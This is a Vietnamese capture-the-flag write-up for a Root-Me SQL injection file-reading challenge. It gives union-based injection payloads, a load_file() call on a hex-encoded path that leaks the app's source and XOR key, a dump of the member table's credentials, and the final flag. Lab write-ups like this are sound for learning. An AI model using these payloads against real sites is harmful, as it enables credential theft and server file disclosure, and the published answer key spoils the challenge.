# SQL injection - file reading

Quan tâm đến đoạn URL sau: 

`http://challenge01.root-me.org/web-serveur/ch31/?action=members&id=1`

Ta sẽ inject bằng cách thay đổi giá trị của id

Thử cho bằng `1 order by 1-- -` và tăng lên thấy đến 5 thì lỗi -> có 4 cột

Thử cho bằng `-1 union select 1,2,3,4-- -` thấy các giá trị 1 2 4 sẽ được hiện lên

Dùng các câu truy vấn khai thác meta-data, ta ra được bảng member với các cột member_id, member_login, member_password.

Thử cho bằng `-1 uinon select 1,2,3, load_file(0x2f6368616c6c656e67652f7765622d736572766575722f636833312f696e6465782e706870)-- -`

Ta có :

```
$key = "c92fcd618967933ac463feb85ba00d5a7ae52842";
....
if($pass == stringxor($key, base64_decode($data['member_password']))){ // authentication success print "

Authentication success !!
"; if ($user == "admin") print "

Yeah !!! You're admin ! Use this password to complete this challenge.
```

Bây giờ ta sẽ cho bằng `-1 union select 1,member_login,3,member_password from member-- -`, ta ra pass dưới dạng base64, decode nó xor với $key, ta ra chuỗi sau: `77be4fc97f77f5f48308942bb6e32aacabed9cef`, đây là sha1 của password

Google cái này, ta ra pass là superadmin

---

### Flag:

`superadmin`